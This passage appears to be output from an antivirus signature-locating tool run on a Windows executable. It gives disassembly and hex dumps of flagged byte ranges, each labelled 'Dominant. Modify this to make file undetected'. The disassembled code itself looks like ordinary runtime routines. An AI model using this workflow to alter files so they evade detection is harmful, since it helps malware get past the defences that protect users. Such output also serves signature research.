0x2fbc: ; CODE XREF from fcn.00403b4b @ 0x403bb5(x)
0x2fbc: 0x00403bbc 8bce mov ecx, esi
0x2fbe: 0x00403bbe e8fd010000 call fcn.00403dc0
0x2fc3: < 0x00403bc3 eb45 jmp 0x403c0a
0x2fc5: ;-- case 1: ; from 0x00403bb5
0x2fc5: ; CODE XREF from fcn.00403b4b @ 0x403bb5(x)
0x2fc5: 0x00403bc5 834e28ff or dword [esi + 0x28], 0xffffffff ; [0xffffffff:4]=-1 ; -1
0x2fc9: 0x00403bc9 895e24 mov dword [esi + 0x24], ebx
0x2fcc: 0x00403bcc 885e30 mov byte [esi + 0x30], bl
0x2fcf: 0x00403bcf 895e20 mov dword [esi + 0x20], ebx
0x2fd2: 0x00403bd2 895e2c mov dword [esi + 0x2c], ebx
0x2fd5: 0x00403bd5 885e3c mov byte [esi + 0x3c], bl
0x2fd8: < 0x00403bd8 eb38 jmp 0x403c12
0x2fda: ;-- case 2: ; from 0x00403bb5
0x2fda: ; CODE XREF from fcn.00403b4b @ 0x403bb5(x)
0x2fda: 0x00403bda 8bce mov ecx, esi
0x2fdc: 0x00403bdc e8a2010000 call fcn.00403d83
0x2fe1: < 0x00403be1 eb27 jmp 0x403c0a
0x2fe3: ;-- case 3: ; from 0x00403bb5
0x2fe3: ; CODE XREF from fcn.00403b4b @ 0x403bb5(x)
0x2fe3: 0x00403be3 8bce mov ecx, esi
0x2fe5: 0x00403be5 e82a0a0000 call fcn.00404614
0x2fea: < 0x00403bea eb1e jmp 0x403c0a
0x2fec: ;-- case 4: ; from 0x00403bb5
0x2fec: ; CODE XREF from fcn.00403b4b @ 0x403bb5(x)
0x2fec: 0x00403bec 895e28 mov dword [esi + 0x28], ebx
0x2fef: < 0x00403bef eb21 jmp 0x403c12
0x2ff1: ;-- case 5: ; from 0x00403bb5
0x2ff1: ; CODE XREF from fcn.00403b4b @ 0x403bb5(x)
0x2ff1: 0x00403bf1 8bce mov ecx, esi
0x2ff3: 0x00403bf3 e84b020000 call fcn.00403e43
0x2ff8: < 0x00403bf8 eb10 jmp 0x403c0a
0x2ffa: ;-- case 6: ; from 0x00403bb5
0x2ffa: ; CODE XREF from fcn.00403b4b @ 0x403bb5(x)
0x2ffa: 0x00403bfa 8bce mov ecx, esi
0x2ffc: 0x00403bfc e869020000 call fcn.00403e6a
0x3001: < 0x00403c01 eb07 jmp 0x403c0a
0x3003: ;-- case 7: ; from 0x00403bb5
0x3003: ; CODE XREF from fcn.00403b4b @ 0x403bb5(x)
0x3003: 0x00403c03 8bce mov ecx, esi
0x3005: 0x00403c05 e850050000 call fcn.0040415a
0x300a: ; CODE XREFS from fcn.00403b4b @ 0x403bc3(x), 0x403be1(x), 0x403bea(x), 0x403bf8(x), 0x403c01(x)
0x300a: > 0x00403c0a 84c0 test al, al
0x300c: < 0x00403c0c 0f8469ffffff je case.default.0x403bb5
0x3012: ; CODE XREFS from fcn.00403b4b @ 0x403b87(x), 0x403bd8(x), 0x403bef(x)
0x3012: > 0x00403c12 8b4610 mov eax, dword [esi + 0x10]
0x3015: 0x00403c15 0fb700 movzx eax, word [eax]
0x3018: 0x00403c18 66894632 mov word [esi + 0x32], ax
0x301c: 0x00403c1c 6685c0 test ax, ax
0x301f: < 0x00403c1f 0f8567ffffff jne 0x403b8c
0x3025: 0x00403c25 83461002 add dword [esi + 0x10], 2
0x3029: ; CODE XREFS from fcn.00403b4b @ 0x403b65(x), 0x403b93(x)
0x3029: > 0x00403c29 ff8650040000 inc dword [esi + 0x450]
0x302f: 0x00403c2f 83be50040000. cmp dword [esi + 0x450], 2
0x3036: < 0x00403c36 0f8545ffffff jne 0x403b81
0x303c: 0x00403c3c 8b4618 mov eax, dword [esi + 0x18]
0x303f: < 0x00403c3f e93affffff jmp 0x403b7e
0x3044: 0x00403c44 8d4900 lea ecx, [ecx]
0x3047: ; CODE XREF from fcn.00403b4b @ 0x403bb5(x)
0x3047: 0x00403c47 .int32 4209596 ; case.0x403bb5.0
0x304b: 0x00403c4b .int32 4209605 ; case.0x403bb5.1
0x304f: 0x00403c4f .int32 4209626 ; case.0x403bb5.2
0x3053: 0x00403c53 .int32 4209635 ; case.0x403bb5.3
0x3057: 0x00403c57 .int32 4209644 ; case.0x403bb5.4
0x305b: 0x00403c5b .int32 4209649 ; case.0x403bb5.5
0x305f: 0x00403c5f .int32 4209658 ; case.0x403bb5.6
0x3063: 0x00403c63 .int32 4209667 ; case.0x403bb5.7
0x3067: ; CALL XREF from fcn.004032e7 @ 0x4033c1(x)
0x3067: 249: fcn.00403c67 ();
0x3067: 0x00403c67 8bff mov edi, edi
0x3069: 0x00403c69 53 push ebx
0x306a: 0x00403c6a 56 push esi
0x306b: 0x00403c6b 8b invalid

Match 34: 12720 (size: 136)

Dominant. Modify this to make file undetected

.text

000031B0   01 EB 0A 83 49 20 20 EB 04 83 49 20 02 B0 01 C3    ....I  ...I ....
000031C0   E8 39 00 00 00 84 C0 75 13 E8 DD 2D 00 00 C7 00    .9.....u...-....
000031D0   16 00 00 00 E8 15 2D 00 00 32 C0 C3 B0 01 C3 E8    ......-..2......
000031E0   44 00 00 00 84 C0 75 13 E8 BE 2D 00 00 C7 00 16    D.....u...-.....
000031F0   00 00 00 E8 F6 2C 00 00 32 C0 C3 B0 01 C3 8B FF    .....,..2.......
00003200   56 8B F1 0F B7 46 32 8D 8E 48 04 00 00 50 C6 46    V....F2..H...P.F
00003210   3C 01 E8 F6 0D 00 00 84 C0 74 05 FF 46 18 EB 04    <........t..F...
00003220   83 4E 18 FF B0 01 5E C3 8D 51 18 C6 41 3C 01 52    .N....^..Q..A<.R
00003230   0F B7 51 32 81 C1 48 04                            ..Q2..H.

0x31a1: 0x00403da1 83492008 or dword [ecx + 0x20], 8
0x31a5: < 0x00403da5 eb16 jmp 0x403dbd
0x31a7: ; CODE XREF from fcn.00403d83 @ 0x403d9a(x)
0x31a7: > 0x00403da7 83492004 or dword [ecx + 0x20], 4
0x31ab: < 0x00403dab eb10 jmp 0x403dbd
0x31ad: ; CODE XREF from fcn.00403d83 @ 0x403d94(x)
0x31ad: > 0x00403dad 83492001 or dword [ecx + 0x20], 1
0x31b1: < 0x00403db1 eb0a jmp 0x403dbd
0x31b3: ; CODE XREF from fcn.00403d83 @ 0x403d8f(x)
0x31b3: > 0x00403db3 83492020 or dword [ecx + 0x20], 0x20 ; [0x20:4]=-1 ; 32
0x31b7: < 0x00403db7 eb04 jmp 0x403dbd
0x31b9: 0x00403db9 83492002 or dword [ecx + 0x20], 2
0x31bd: ; CODE XREFS from fcn.00403d83 @ 0x403d9f(x), 0x403da5(x), 0x403dab(x), 0x403db1(x), 0x403db7(x)
0x31bd: > 0x00403dbd b001 mov al, 1
0x31bf: 0x00403dbf c3 ret
0x31c0: ; CALL XREF from fcn.00403b4b @ 0x403bbe(x)
0x31c0: 31: fcn.00403dc0 ();
0x31c0: 0x00403dc0 e839000000 call fcn.00403dfe
0x31c5: 0x00403dc5 84c0 test al, al
0x31c7: < 0x00403dc7 7513 jne 0x403ddc
0x31c9: 0x00403dc9 e8dd2d0000 call fcn.00406bab
0x31ce: 0x00403dce c70016000000 mov dword [eax], 0x16 ; [0x16:4]=-1 ; 22
0x31d4: 0x00403dd4 e8152d0000 call fcn.00406aee
0x31d9: 0x00403dd9 32c0 xor al, al
0x31db: 0x00403ddb c3 ret
0x31dc: ; CODE XREF from fcn.00403dc0 @ 0x403dc7(x)
0x31dc: > 0x00403ddc b001 mov al, 1
0x31de: 0x00403dde c3 ret
0x31df: ; CALL XREF from fcn.00403c67 @ 0x403cda(x)
0x31df: 31: fcn.00403ddf ();
0x31df: 0x00403ddf e844000000 call fcn.00403e28
0x31e4: 0x00403de4 84c0 test al, al
0x31e6: < 0x00403de6 7513 jne 0x403dfb
0x31e8: 0x00403de8 e8be2d0000 call fcn.00406bab
0x31ed: 0x00403ded c70016000000 mov dword [eax], 0x16 ; [0x16:4]=-1 ; 22
0x31f3: 0x00403df3 e8f62c0000 call fcn.00406aee
0x31f8: 0x00403df8 32c0 xor al, al
0x31fa: 0x00403dfa c3 ret
0x31fb: ; CODE XREF from fcn.00403ddf @ 0x403de6(x)
0x31fb: > 0x00403dfb b001 mov al, 1
0x31fd: 0x00403dfd c3 ret
0x31fe: ; CALL XREF from fcn.00403dc0 @ 0x403dc0(x)
0x31fe: 42: fcn.00403dfe ();
0x31fe: 0x00403dfe 8bff mov edi, edi
0x3200: 0x00403e00 56 push esi
0x3201: 0x00403e01 8bf1 mov esi, ecx
0x3203: 0x00403e03 0fb74632 movzx eax, word [esi + 0x32]
0x3207: 0x00403e07 8d8e48040000 lea ecx, [esi + 0x448]
0x320d: 0x00403e0d 50 push eax
0x320e: 0x00403e0e c6463c01 mov byte [esi + 0x3c], 1
0x3212: 0x00403e12 e8f60d0000 call fcn.00404c0d
0x3217: 0x00403e17 84c0 test al, al
0x3219: < 0x00403e19 7405 je 0x403e20
0x321b: 0x00403e1b ff4618 inc dword [esi + 0x18]
0x321e: < 0x00403e1e eb04 jmp 0x403e24
0x3220: ; CODE XREF from fcn.00403dfe @ 0x403e19(x)
0x3220: > 0x00403e20 834e18ff or dword [esi + 0x18], 0xffffffff ; [0xffffffff:4]=-1 ; -1
0x3224: ; CODE XREF from fcn.00403dfe @ 0x403e1e(x)
0x3224: > 0x00403e24 b001 mov al, 1
0x3226: 0x00403e26 5e pop esi
0x3227: 0x00403e27 c3 ret
0x3228: ; CALL XREF from fcn.00403ddf @ 0x403ddf(x)
0x3228: 27: fcn.00403e28 ();
0x3228: 0x00403e28 8d5118 lea edx, [ecx + 0x18]
0x322b: 0x00403e2b c6413c01 mov byte [ecx + 0x3c], 1
0x322f: 0x00403e2f 52 push edx
0x3230: 0x00403e30 0fb75132 movzx edx, word [ecx + 0x32]
0x3234: 0x00403e34 81c148040000 add ecx, 0x448 ; 1096
0x323a: 0x00403e3a 52 push edx
0x323b: 0x00403e3b e8880d0000 call fcn.00404bc8
0x3240: 0x00403e40 b001 mov al, 1
0x3242: 0x00403e42 c3 ret
0x3243: ; CALL XREF from fcn.00403b4b @ 0x403bf3(x)
0x3243: ; CALL XREF from fcn.00403c67 @ 0x403d0f(x)
0x3243: 39: fcn.00403e43 ();
0x3243: 0x00403e43 668379322a cmp word [ecx + 0x32], 0x2a ; '*'

Match 35: 16324 (size: 136)

Dominant. Modify this to make file undetected

.text

00003FC4   C3 B0 01 C3 8B FF 55 8B EC 8B D1 8B 0A 8B 41 08    ......U.......A.
00003FD4   3B 41 04 8B 45 0C 75 14 80 79 0C 00 74 04 FF 00    ;A..E.u..y..t...
00003FE4   EB 03 83 08 FF 8B 02 8A 40 0C EB 19 FF 00 8B 02    ........@.......
00003FF4   FF 40 08 8B 02 8B 08 66 8B 45 08 66 89 01 8B 02    .@.....f.E.f....
00004004   83 00 02 B0 01 5D C2 08 00 8B FF 55 8B EC 8B 01    .....].....U....
00004014   8B 40 0C 90 C1 E8 0C A8 01 74 0C 8B 01 83 78 04    .@.......t....x.
00004024   00 75 04 B0 01 EB 17 FF 31 FF 75 08 E8 42 40 00    .u......1.u..B@.
00004034   00 59 59 B9 FF FF 00 00 66 3B C1 0F 95 C0 5D C2    .YY.....f;....].
00004044   04 00 8B FF 55 8B EC 51                            ....U..Q

0x3fb7: 0x00404bb7 c70016000000 mov dword [eax], 0x16 ; [0x16:4]=-1 ; 22
0x3fbd: 0x00404bbd e82c1f0000 call fcn.00406aee
0x3fc2: 0x00404bc2 32c0 xor al, al
0x3fc4: 0x00404bc4 c3 ret
0x3fc5: ; CODE XREF from fcn.00404bad @ 0x404bb0(x)
0x3fc5: > 0x00404bc5 b001 mov al, 1
0x3fc7: 0x00404bc7 c3 ret
0x3fc8: ; CALL XREF from fcn.0040376f @ 0x40378b(x)
0x3fc8: ; CALL XREF from fcn.00403e28 @ 0x403e3b(x)
0x3fc8: ; CALL XREF from fcn.00404cd3 @ 0x404d23(x)
0x3fc8: 69: fcn.00404bc8 (int32_t arg_8h, int32_t arg_ch);
0x3fc8: ; arg int32_t arg_8h @ ebp+0x8
0x3fc8: ; arg int32_t arg_ch @ ebp+0xc
0x3fc8: 0x00404bc8 8bff mov edi, edi
0x3fca: 0x00404bca 55 push ebp
0x3fcb: 0x00404bcb 8bec mov ebp, esp
0x3fcd: 0x00404bcd 8bd1 mov edx, ecx
0x3fcf: 0x00404bcf 8b0a mov ecx, dword [edx]
0x3fd1: 0x00404bd1 8b4108 mov eax, dword [ecx + 8]
0x3fd4: 0x00404bd4 3b4104 cmp eax, dword [ecx + 4]
0x3fd7: 0x00404bd7 8b450c mov eax, dword [arg_ch]
0x3fda: < 0x00404bda 7514 jne 0x404bf0
0x3fdc: 0x00404bdc 80790c00 cmp byte [ecx + 0xc], 0
0x3fe0: < 0x00404be0 7404 je 0x404be6
0x3fe2: 0x00404be2 ff00 inc dword [eax]
0x3fe4: < 0x00404be4 eb03 jmp 0x404be9
0x3fe6: ; CODE XREF from fcn.00404bc8 @ 0x404be0(x)
0x3fe6: > 0x00404be6 8308ff or dword [eax], 0xffffffff ; [0xffffffff:4]=-1 ; -1
0x3fe9: ; CODE XREF from fcn.00404bc8 @ 0x404be4(x)
0x3fe9: > 0x00404be9 8b02 mov eax, dword [edx]
0x3feb: 0x00404beb 8a400c mov al, byte [eax + 0xc]
0x3fee: < 0x00404bee eb19 jmp 0x404c09
0x3ff0: ; CODE XREF from fcn.00404bc8 @ 0x404bda(x)
0x3ff0: > 0x00404bf0 ff00 inc dword [eax]
0x3ff2: 0x00404bf2 8b02 mov eax, dword [edx]
0x3ff4: 0x00404bf4 ff4008 inc dword [eax + 8]
0x3ff7: 0x00404bf7 8b02 mov eax, dword [edx]
0x3ff9: 0x00404bf9 8b08 mov ecx, dword [eax]
0x3ffb: 0x00404bfb 668b4508 mov ax, word [arg_8h]
0x3fff: 0x00404bff 668901 mov word [ecx], ax
0x4002: 0x00404c02 8b02 mov eax, dword [edx]
0x4004: 0x00404c04 830002 add dword [eax], 2
0x4007: 0x00404c07 b001 mov al, 1
0x4009: ; CODE XREF from fcn.00404bc8 @ 0x404bee(x)
0x4009: > 0x00404c09 5d pop ebp
0x400a: 0x00404c0a c20800 ret 8
0x400d: ; CALL XREF from fcn.0040372f @ 0x40374a(x)
0x400d: ; CALL XREF from fcn.00403dfe @ 0x403e12(x)
0x400d: ; CALL XREF from fcn.00404c46 @ 0x404c8e(x)
0x400d: ; CALL XREFS from fcn.00404d60 @ 0x404e43(x), 0x404e69(x)
0x400d: 57: fcn.00404c0d (int32_t arg_8h);
0x400d: ; arg int32_t arg_8h @ ebp+0x8
0x400d: 0x00404c0d 8bff mov edi, edi
0x400f: 0x00404c0f 55 push ebp
0x4010: 0x00404c10 8bec mov ebp, esp
0x4012: 0x00404c12 8b01 mov eax, dword [ecx]
0x4014: 0x00404c14 8b400c mov eax, dword [eax + 0xc]
0x4017: 0x00404c17 90 nop
0x4018: 0x00404c18 c1e80c shr eax, 0xc
0x401b: 0x00404c1b a801 test al, 1 ; 1
0x401d: < 0x00404c1d 740c je 0x404c2b
0x401f: 0x00404c1f 8b01 mov eax, dword [ecx]
0x4021: 0x00404c21 83780400 cmp dword [eax + 4], 0
0x4025: < 0x00404c25 7504 jne 0x404c2b
0x4027: 0x00404c27 b001 mov al, 1
0x4029: < 0x00404c29 eb17 jmp 0x404c42
0x402b: ; CODE XREFS from fcn.00404c0d @ 0x404c1d(x), 0x404c25(x)
0x402b: > 0x00404c2b ff31 push dword [ecx] ; int32_t arg_ch
0x402d: 0x00404c2d ff7508 push dword [arg_8h] ; int32_t arg_8h
0x4030: 0x00404c30 e842400000 call fcn.00408c77
0x4035: 0x00404c35 59 pop ecx
0x4036: 0x00404c36 59 pop ecx
0x4037: 0x00404c37 b9ffff0000 mov ecx, 0xffff
0x403c: 0x00404c3c 663bc1 cmp ax, cx
0x403f: 0x00404c3f 0f95c0 setne al
0x4042: ; CODE XREF from fcn.00404c0d @ 0x404c29(x)
0x4042: > 0x00404c42 5d pop ebp
0x4043: 0x00404c43 c20400 ret 4
0x4046: ; CALL XREF from fcn.0040415a @ 0x404382(x)
0x4046: 141: fcn.00404c46 ();
0x4046: ; var int32_t var_4h @ ebp-0x4
0x4046: ; var int32_t var_8h @ ebp-0x8
0x4046: 0x00404c46 8bff mov edi, edi
0x4048: 0x00404c48 55 push ebp
0x4049: 0x00404c49 8bec mov ebp, esp
0x404b: 0x00404c4b 51 push ecx
0x404c: 0x00404c4c 51 push ecx
0x404d: 0x00404c4d 53 push ebx
0x404e: 0x00404c4e 56 push esi
0x404f: 0x00404c4f 8bf1 mov esi, ecx
0x4051: 0x00404c51 57 push edi
0x4052: 0x00404c52 807e3c00 cmp byte [esi + 0x3c], 0
0x4056: < 0x00404c56 7559 jne 0x404cb1
0x4058: 0x00404c58 33ff xor edi, edi
0x405a: 0x00404c5a 39 invalid
0x405b: 0x00404c5b 7e invalid

Match 36: 17072 (size: 204)

Dominant. Modify this to make file undetected

.text

000042B0   8B 45 08 0F B7 04 48 23 45 10 5D C3 33 C0 5D C3    .E....H#E.].3.].
000042C0   8B FF 55 8B EC 83 EC 38 8B 45 1C 8B 4D 10 8B 55    ..U....8.E..M..U
000042D0   14 89 45 EC 8B 45 18 89 45 F4 8B 45 08 89 45 DC    ..E..E..E..E..E.
000042E0   8B 45 0C 89 55 F0 89 4D F8 89 45 E0 85 C9 75 15    .E..U..M..E...u.
000042F0   E8 B6 1C 00 00 C7 00 16 00 00 00 E8 EE 1B 00 00    ................
00004300   83 C8 FF C9 C3 85 D2 74 E7 8D 45 F8 89 4D E8 89    .......t..E..M..
00004310   45 C8 8D 45 F4 89 45 CC 8D 45 DC 89 45 D0 8D 45    E..E..E..E..E..E
00004320   F0 89 45 D4 8D 45 EC 89 45 D8 8D 45 E8 50 8D 45    ..E..E..E..E.P.E
00004330   C8 89 4D E4 50 8D 45 E4 50 8D 4D FF E8 4B E3 FF    ..M.P.E.P.M..K..
00004340   FF C9 C3 8B FF 55 8B EC FF 75 20 FF 75 1C FF 75    .....U...u .u..u
00004350   18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 85 E3    ..u..u..u..u....
00004360   FF FF 83 C4 1C 5D C3 8B FF 55 8B EC 51 FF 75 08    .....]...U..Q.u.
00004370   C7 45 FC 00 00 00 00 8B 45 FC E8 9C                .E......E...

0x42a0: 0x00404ea0 55 push ebp
0x42a1: 0x00404ea1 8bec mov ebp, esp
0x42a3: 0x00404ea3 8b4d0c mov ecx, dword [arg_ch]
0x42a6: 0x00404ea6 8d4101 lea eax, [ecx + 1]
0x42a9: 0x00404ea9 3d00010000 cmp eax, 0x100 ; 256
0x42ae: < 0x00404eae 770c ja 0x404ebc
0x42b0: 0x00404eb0 8b4508 mov eax, dword [arg_8h]
0x42b3: 0x00404eb3 0fb70448 movzx eax, word [eax + ecx*2]
0x42b7: 0x00404eb7 234510 and eax, dword [arg_10h]
0x42ba: 0x00404eba 5d pop ebp
0x42bb: 0x00404ebb c3 ret
0x42bc: ; CODE XREF from fcn.00404e9e @ 0x404eae(x)
0x42bc: > 0x00404ebc 33c0 xor eax, eax
0x42be: 0x00404ebe 5d pop ebp
0x42bf: 0x00404ebf c3 ret
0x42c0: ; CALL XREF from fcn.004011c0 @ 0x4011e7(x)
0x42c0: 131: fcn.00404ec0 (int32_t arg_8h, int32_t arg_ch, int32_t arg_10h, int32_t arg_14h, int32_t arg_18h, int32_t arg_1ch);
0x42c0: ; arg int32_t arg_8h @ ebp+0x8
0x42c0: ; arg int32_t arg_ch @ ebp+0xc
0x42c0: ; arg int32_t arg_10h @ ebp+0x10
0x42c0: ; arg int32_t arg_14h @ ebp+0x14
0x42c0: ; arg int32_t arg_18h @ ebp+0x18
0x42c0: ; arg int32_t arg_1ch @ ebp+0x1c
0x42c0: ; var int32_t var_1h @ ebp-0x1
0x42c0: ; var int32_t var_8h @ ebp-0x8
0x42c0: ; var int32_t var_ch @ ebp-0xc
0x42c0: ; var int32_t var_10h @ ebp-0x10
0x42c0: ; var int32_t var_14h @ ebp-0x14
0x42c0: ; var int32_t var_18h @ ebp-0x18
0x42c0: ; var int32_t var_1ch @ ebp-0x1c
0x42c0: ; var int32_t var_20h @ ebp-0x20
0x42c0: ; var int32_t var_24h @ ebp-0x24
0x42c0: ; var int32_t var_28h @ ebp-0x28
0x42c0: ; var int32_t var_2ch @ ebp-0x2c
0x42c0: ; var int32_t var_30h @ ebp-0x30
0x42c0: ; var int32_t var_34h @ ebp-0x34
0x42c0: ; var int32_t var_38h @ ebp-0x38
0x42c0: 0x00404ec0 8bff mov edi, edi
0x42c2: 0x00404ec2 55 push ebp
0x42c3: 0x00404ec3 8bec mov ebp, esp
0x42c5: 0x00404ec5 83ec38 sub esp, 0x38
0x42c8: 0x00404ec8 8b451c mov eax, dword [arg_1ch]
0x42cb: 0x00404ecb 8b4d10 mov ecx, dword [arg_10h]
0x42ce: 0x00404ece 8b5514 mov edx, dword [arg_14h]
0x42d1: 0x00404ed1 8945ec mov dword [var_14h], eax
0x42d4: 0x00404ed4 8b4518 mov eax, dword [arg_18h]
0x42d7: 0x00404ed7 8945f4 mov dword [var_ch], eax
0x42da: 0x00404eda 8b4508 mov eax, dword [arg_8h]
0x42dd: 0x00404edd 8945dc mov dword [var_24h], eax
0x42e0: 0x00404ee0 8b450c mov eax, dword [arg_ch]
0x42e3: 0x00404ee3 8955f0 mov dword [var_10h], edx
0x42e6: 0x00404ee6 894df8 mov dword [var_8h], ecx
0x42e9: 0x00404ee9 8945e0 mov dword [var_20h], eax
0x42ec: 0x00404eec 85c9 test ecx, ecx
0x42ee: < 0x00404eee 7515 jne 0x404f05
0x42f0: ; CODE XREF from fcn.00404ec0 @ 0x404f07(x)
0x42f0: > 0x00404ef0 e8b61c0000 call fcn.00406bab
0x42f5: 0x00404ef5 c70016000000 mov dword [eax], 0x16 ; [0x16:4]=-1 ; 22
0x42fb: 0x00404efb e8ee1b0000 call fcn.00406aee
0x4300: 0x00404f00 83c8ff or eax, 0xffffffff ; -1
0x4303: 0x00404f03 c9 leave
0x4304: 0x00404f04 c3 ret
0x4305: ; CODE XREF from fcn.00404ec0 @ 0x404eee(x)
0x4305: > 0x00404f05 85d2 test edx, edx
0x4307: < 0x00404f07 74e7 je 0x404ef0
0x4309: 0x00404f09 8d45f8 lea eax, [var_8h]
0x430c: 0x00404f0c 894de8 mov dword [var_18h], ecx
0x430f: 0x00404f0f 8945c8 mov dword [var_38h], eax
0x4312: 0x00404f12 8d45f4 lea eax, [var_ch]
0x4315: 0x00404f15 8945cc mov dword [var_34h], eax
0x4318: 0x00404f18 8d45dc lea eax, [var_24h]
0x431b: 0x00404f1b 8945d0 mov dword [var_30h], eax
0x431e: 0x00404f1e 8d45f0 lea eax, [var_10h]
0x4321: 0x00404f21 8945d4 mov dword [var_2ch], eax
0x4324: 0x00404f24 8d45ec lea eax, [var_14h]
0x4327: 0x00404f27 8945d8 mov dword [var_28h], eax
0x432a: 0x00404f2a 8d45e8 lea eax, [var_18h]
0x432d: 0x00404f2d 50 push eax
0x432e: 0x00404f2e 8d45c8 lea eax, [var_38h]
0x4331: 0x00404f31 894de4 mov dword [var_1ch], ecx
0x4334: 0x00404f34 50 push eax ; int32_t arg_ch
0x4335: 0x00404f35 8d45e4 lea eax, [var_1ch]
0x4338: 0x00404f38 50 push eax ; int32_t arg_8h
0x4339: 0x00404f39 8d4dff lea ecx, [var_1h]
0x433c: 0x00404f3c e84be3ffff call fcn.0040328c
0x4341: 0x00404f41 c9 leave
0x4342: 0x00404f42 c3 ret
0x4343: ; CALL XREF from fcn.00401200 @ 0x401220(x)
0x4343: 36: fcn.00404f43 (int32_t arg_8h, int32_t arg_ch, int32_t arg_10h, int32_t arg_14h, int32_t arg_18h, int32_t arg_1ch, int32_t arg_20h);
0x4343: ; arg int32_t arg_8h @ ebp+0x8
0x4343: ; arg int32_t arg_ch @ ebp+0xc
0x4343: ; arg int32_t arg_10h @ ebp+0x10
0x4343: ; arg int32_t arg_14h @ ebp+0x14
0x4343: ; arg int32_t arg_18h @ ebp+0x18
0x4343: ; arg int32_t arg_1ch @ ebp+0x1c
0x4343: ; arg int32_t arg_20h @ ebp+0x20
0x4343: 0x00404f43 8bff mov edi, edi
0x4345: 0x00404f45 55 push ebp
0x4346: 0x00404f46 8bec mov ebp, esp
0x4348: 0x00404f48 ff7520 push dword [arg_20h] ; int32_t arg_20h
0x434b: 0x00404f4b ff751c push dword [arg_1ch] ; int32_t arg_1ch
0x434e: 0x00404f4e ff7518 push dword [arg_18h] ; uint32_t arg_18h
0x4351: 0x00404f51 ff7514 push dword [arg_14h] ; int32_t arg_14h
0x4354: 0x00404f54 ff7510 push dword [arg_10h] ; int32_t arg_10h
0x4357: 0x00404f57 ff750c push dword [arg_ch] ; int32_t arg_ch
0x435a: 0x00404f5a ff7508 push dword [arg_8h] ; int32_t arg_8h
0x435d: 0x00404f5d e885e3ffff call fcn.004032e7
0x4362: 0x00404f62 83c41c add esp, 0x1c
0x4365: 0x00404f65 5d pop ebp
0x4366: 0x00404f66 c3 ret
0x4367: ; CALL XREF from fcn.00401200 @ +0x66(x)
0x4367: ; CALL XREF from fcn.004027d7 @ +0x42(x)
0x4367: ; CALL XREF from fcn.00402831 @ 0x4028b0(x)
0x4367: 27: fcn.00404f67 (int32_t arg_8h);
0x4367: ; arg int32_t arg_8h @ ebp+0x8
0x4367: ; var int32_t var_4h @ ebp-0x4
0x4367: 0x00404f67 8bff mov edi, edi
0x4369: 0x00404f69 55 push ebp
0x436a: 0x00404f6a 8bec mov ebp, esp
0x436c: 0x00404f6c 51 push ecx
0x436d: 0x00404f6d ff7508 push dword [arg_8h] ; uint32_t arg_8h
0x4370: 0x00404f70 c745fc000000. mov dword [var_4h], 0
0x4377: 0x00404f77 8b45fc mov eax, dword [var_4h]
0x437a: 0x00404f7a e89c1c0000 call fcn.00406c1b
0x437f: 0x00404f7f 59 pop ecx
0x4380: 0x00404f80 c9 leave
0x4381: 0x00404f81 c3 ret
0x4382: ; CALL XREF from fcn.00401200 @ +0x46(x)
0x4382: 11: fcn.00404f82 ();
0x4382: 0x00404f82 8bff mov edi, edi
0x4384: 0x00404f84 55 push ebp
0x4385: 0x00404f85 8bec mov ebp, esp
0x4387: 0x00404f87 5d pop ebp
0x4388: 0x00404f88 e9 invalid
0x4389: 0x00404f89 aa stosb byte es:[edi], al
0x438a: 0x00404f8a 26 invalid
0x438b: 0x00404f8b 00 invalid

Match 37: 17616 (size: 680)

Dominant. Modify this to make file undetected

.text

000044D0   FF D7 8B 45 FC 59 89 46 04 E9 0F FF FF FF 33 C0    ...E.Y.F......3.
000044E0   5F 5E 5B C9 C3 A1 D4 AC 41 00 C3 8B FF 55 8B EC    _^[.....A....U..
000044F0   8B 45 08 A3 D4 AC 41 00 5D C3 8B FF 55 8B EC A1    .E....A.]...U...
00004500   04 A0 41 00 83 E0 1F 6A 20 59 2B C8 8B 45 08 D3    ..A....j Y+..E..
00004510   C8 33 05 04 A0 41 00 5D C3 A1 04 A0 41 00 8B C8    .3...A.]....A...
00004520   33 05 D8 AC 41 00 83 E1 1F D3 C8 85 C0 0F 95 C0    3...A...........
00004530   C3 8B FF 55 8B EC 8B 45 08 A3 D8 AC 41 00 5D C3    ...U...E....A.].
00004540   8B FF 55 8B EC 56 8B 35 04 A0 41 00 8B CE 33 35    ..U..V.5..A...35
00004550   D8 AC 41 00 83 E1 1F D3 CE 85 F6 75 04 33 C0 EB    ..A........u.3..
00004560   0E FF 75 08 8B CE FF 15 20 21 41 00 FF D6 59 5E    ..u..... !A...Y^
00004570   5D C3 8B FF 55 8B EC FF 75 08 E8 7B FF FF FF 59    ]...U...u..{...Y
00004580   A3 D8 AC 41 00 5D C3 8B FF 55 8B EC 83 EC 10 53    ...A.]...U.....S
00004590   8B 5D 08 85 DB 75 07 33 C0 E9 15 01 00 00 56 83    .]...u.3......V.
000045A0   FB 02 74 1B 83 FB 01 74 16 E8 FD 19 00 00 6A 16    ..t....t......j.
000045B0   5E 89 30 E8 36 19 00 00 8B C6 E9 F3 00 00 00 57    ^.0.6..........W
000045C0   68 04 01 00 00 BE E0 AC 41 00 33 FF 56 57 FF 15    h.......A.3.VW..
000045D0   88 20 41 00 A1 1C AF 41 00 89 35 08 AF 41 00 89    . A....A..5..A..
000045E0   45 F0 85 C0 74 05 66 39 38 75 05 8B C6 89 75 F0    E...t.f98u....u.
000045F0   8D 4D F4 89 7D FC 51 8D 4D FC 89 7D F4 51 57 57    .M..}.Q.M..}.QWW
00004600   50 E8 B0 00 00 00 6A 02 FF 75 F4 FF 75 FC E8 37    P.....j..u..u..7
00004610   02 00 00 8B F0 83 C4 20 85 F6 75 0C E8 8A 19 00    ....... ..u.....
00004620   00 6A 0C 5F 89 38 EB 32 8D 45 F4 50 8D 45 FC 50    .j._.8.2.E.P.E.P
00004630   8B 45 FC 8D 04 86 50 56 FF 75 F0 E8 76 00 00 00    .E....PV.u..v...
00004640   83 C4 14 83 FB 01 75 16 8B 45 FC 48 A3 0C AF 41    ......u..E.H...A
00004650   00 8B C6 8B F7 A3 14 AF 41 00 8B DF EB 4A 8D 45    ........A....J.E
00004660   F8 89 7D F8 50 56 E8 06 43 00 00 8B D8 59 59 85    ..}.PV..C....YY.
00004670   DB 74 05 8B 45 F8 EB 26 8B 55 F8 8B CF 8B C2 39    .t..E..&.U.....9
00004680   3A 74 08 8D 40 04 41 39 38 75 F8 8B C7 89 0D 0C    :t..@.A98u......
00004690   AF 41 00 89 45 F8 8B DF 89 15 14 AF 41 00 50 E8    .A..E.......A.P.
